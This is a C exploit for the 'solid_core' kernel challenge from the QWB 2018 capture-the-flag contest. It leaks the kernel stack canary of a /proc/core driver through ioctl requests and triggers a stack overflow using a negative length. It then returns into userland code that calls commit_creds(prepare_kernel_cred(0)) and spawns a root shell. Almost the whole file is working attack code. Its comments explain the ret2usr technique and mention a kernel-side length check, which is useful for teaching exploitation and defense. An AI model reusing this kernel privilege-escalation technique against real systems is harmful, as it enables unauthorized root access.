QWB2018 solid_core
#include <stdio.h> | |
#include <stdlib.h> | |
#include <string.h> | |
#include <unistd.h> | |
#include <sys/stat.h> | |
#include <fcntl.h> | |
#include <sys/types.h> | |
#include <sys/ioctl.h> | |
/* Opaque kernel types: only pointers to them are ever used, so no definition is needed. */
struct cred;
struct task_struct;
/* Function-pointer types for the two kernel symbols resolved at runtime from /tmp/kallsyms
 * (see get_kernel_sym / main). regparm(3) is a 32-bit x86 register-passing attribute; the
 * inline asm in this file is 64-bit (rax, pushfq, iretq), so it is a leftover from a 32-bit
 * template rather than something the code relies on. */
typedef struct cred *(*prepare_kernel_cred_t) (struct task_struct *daemon) __attribute__((regparm(3)));
typedef int (*commit_creds_t) (struct cred *new) __attribute__((regparm(3)));
prepare_kernel_cred_t prepare_kernel_cred;   /* set in main; 0 if the symbol was not found */
commit_creds_t commit_creds;                 /* set in main; 0 if the symbol was not found */
int fd;                                      /* /proc/core descriptor opened in main */
long user_stack;                             /* address of main's buf, restored as rsp by the iretq in get_root */
/* User-mode segment selectors and flags captured by save_state() and reused by get_root. */
unsigned long user_cs;
unsigned long user_ss;
unsigned long user_rflags;
/* Snapshot the current user-mode cs, ss and rflags into the globals above so that
 * get_root can build a valid iretq frame later. Intel operand order ("mov %0, cs" =
 * destination first), so this translation unit must be compiled with -masm=intel.
 * Note: the empty parameter list should be `(void)` in a prototype-style definition. */
static void save_state() {
    __asm__("mov %0, cs\n"
            "mov %1, ss\n"
            "pushfq\n"        /* push rflags ... */
            "popq %2\n"       /* ... and pop it into user_rflags */
            :"=r"(user_cs),"=r"(user_ss),"=r"(user_rflags)
            :
            :"memory"
    );
}
/* Target of the iretq in get_root: once back in user mode, spawn an interactive shell
 * inheriting whatever credentials the process now holds. The return value of system()
 * is deliberately ignored, exactly as in the original. */
void launch_shell(void) {
    static const char *const shell_path = "/bin/sh";
    (void)system(shell_path);
}
/* Executed in kernel context: main writes this function's address at +0x50 of the
 * buffer handed to the driver. Both kernel function pointers come from get_kernel_sym(),
 * which returns 0 when a name is not found, and main never checks the result — a failed
 * lookup therefore turns into a NULL call here (an immediate kernel oops, not a clean exit). */
void get_root(void) {
    commit_creds(prepare_kernel_cred(0));
    /* Return to user mode by hand: swapgs, then push an iretq frame in the order the CPU
     * expects (ss, rsp, rflags, cs, rip) using the values captured by save_state(), main's
     * buf as the stack and launch_shell as the resume address. Intel syntax ("mov rax, %0"),
     * so the file must be built with -masm=intel.
     * NOTE(review): no CR3/page-table switch is done before iretq — presumably this assumes a
     * kernel without user page-table isolation; confirm against the target configuration. */
    __asm__("swapgs\n"
            "mov rax, %0\n"
            "push rax\n"
            "mov rax, %1\n"
            "push rax\n"
            "mov rax, %2\n"
            "push rax\n"
            "mov rax, %3\n"
            "push rax\n"
            "mov rax, %4\n"
            "push rax\n"
            "iretq\n"
            :
            :"r"(user_ss),"r"(user_stack),"r"(user_rflags),"r"(user_cs),"r"(launch_shell)
            :"memory"
    );
}
// from https://www.exploit-db.com/exploits/44303 | |
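/* Look up `name` in /tmp/kallsyms (a copy of the kernel's symbol table in the usual
 * "<hex address> <type> <name>[ [module]]" line format) and return its address.
 *
 * @param name  NUL-terminated symbol name to search for (exact match).
 * @return      the symbol's address, or 0 if the file holds no such symbol.
 * Exits the process with -1 if /tmp/kallsyms cannot be opened (unchanged from the
 * original, since main relies on that).
 *
 * Fixes over the original: the symbol name conversion is bounded (`%255s`), so an
 * over-long line can no longer overflow the 256-byte stack buffer; the address is
 * parsed with `%lx` into the unsigned long it is stored in instead of aliasing it
 * through `%p`/`void **`; and each line is consumed with fgets so a trailing module
 * column or a malformed line simply skips to the next line instead of desynchronising
 * the token stream. */
unsigned long get_kernel_sym(char *name)
{
    FILE *f = fopen("/tmp/kallsyms", "r");
    if (f == NULL) {
        printf("[-] Failed to open /tmp/kallsyms\n");
        exit(-1);
    }
    printf("[+] Find %s...\n", name);

    char line[512];
    while (fgets(line, sizeof line, f) != NULL) {
        unsigned long addr = 0;
        char type = 0;
        char sname[256];
        /* Three fields required; anything else (blank line, module-only continuation,
         * garbage) is skipped. %255s leaves room for the terminating NUL. */
        if (sscanf(line, "%lx %c %255s", &addr, &type, sname) != 3) {
            continue;
        }
        if (strcmp(name, sname) == 0) {
            fclose(f);
            printf("[+] Found %s at %lx\n", name, addr);
            return addr;
        }
    }
    fclose(f);
    return 0;
}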
/* Issue request 0x6677889A on the /proc/core descriptor with `size` as its argument.
 * What the driver does with `size` is not visible in this file (main passes a value
 * whose high bit is set). The ioctl return value is discarded, as in the original. */
void core_copy(long size) {
    const unsigned long request = 0x6677889A;
    (void)ioctl(fd, request, size);
}
/* Issue request 0x6677889B on the /proc/core descriptor, passing `buf` as the argument
 * (main treats the buffer as filled by the driver afterwards). Return value discarded,
 * as in the original. */
void core_read(char* buf) {
    const unsigned long request = 0x6677889B;
    (void)ioctl(fd, request, buf);
}
/* Issue request 0x6677889C on the /proc/core descriptor with `off` as the argument
 * (main calls it with 0x40 before core_read). Return value discarded, as in the original. */
void set_off(unsigned long off) {
    const unsigned long request = 0x6677889C;
    (void)ioctl(fd, request, off);
}
/* Driver for the /proc/core exercise: resolve kernel symbols, read one word back from
 * the driver, then write a 0x200-byte buffer whose +0x40/+0x48/+0x50 words are chosen
 * so that the driver's copy lands get_root as a return address. */
int main(void) {
    /* 0x800-byte user buffer; it is also the stack that get_root's iretq returns onto. */
    unsigned long buf[0x800/8];
    user_stack = buf;   /* pointer stored in a long without a cast (compiler warning) */
    save_state();
    /* get_kernel_sym exits if /tmp/kallsyms is missing but returns 0 for an absent
     * symbol; neither result is checked here, so a 0 becomes a NULL call in get_root. */
    prepare_kernel_cred = (prepare_kernel_cred_t)get_kernel_sym("prepare_kernel_cred");
    commit_creds = (commit_creds_t)get_kernel_sym("commit_creds");
    puts("open /proc/core");
    fd = open("/proc/core", O_RDWR);
    if (fd < 0)
        exit(1);
    puts("leak kernel canary");
    memset(buf, 0, 0x800);
    set_off(0x40);
    core_read(buf);
    /* The first word the driver hands back after set_off(0x40) is treated as the
     * kernel stack canary. */
    unsigned long canary = buf[0];
    printf("canary = %lx\n", canary);
    puts("cause stack bof");
    /* Hard-coded layout of the written buffer: canary at +0x40, user_stack at +0x48,
     * get_root at +0x50. NOTE(review): these offsets presumably mirror the driver's
     * stack frame; they cannot be verified from this file. */
    buf[0x40/8] = canary;
    buf[0x48/8] = user_stack;
    buf[0x50/8] = get_root;   /* function pointer stored into unsigned long without a cast */
    write(fd, buf, 0x200);    /* return value unchecked */
    /* A large value with the high bit set passed through a signed long. NOTE(review):
     * presumably the driver compares it as signed; confirm. Defensive fix on the kernel
     * side is to range-check ioctl-supplied lengths as unsigned against the destination. */
    core_copy(0xffffffffffff0080);
    return 0;
}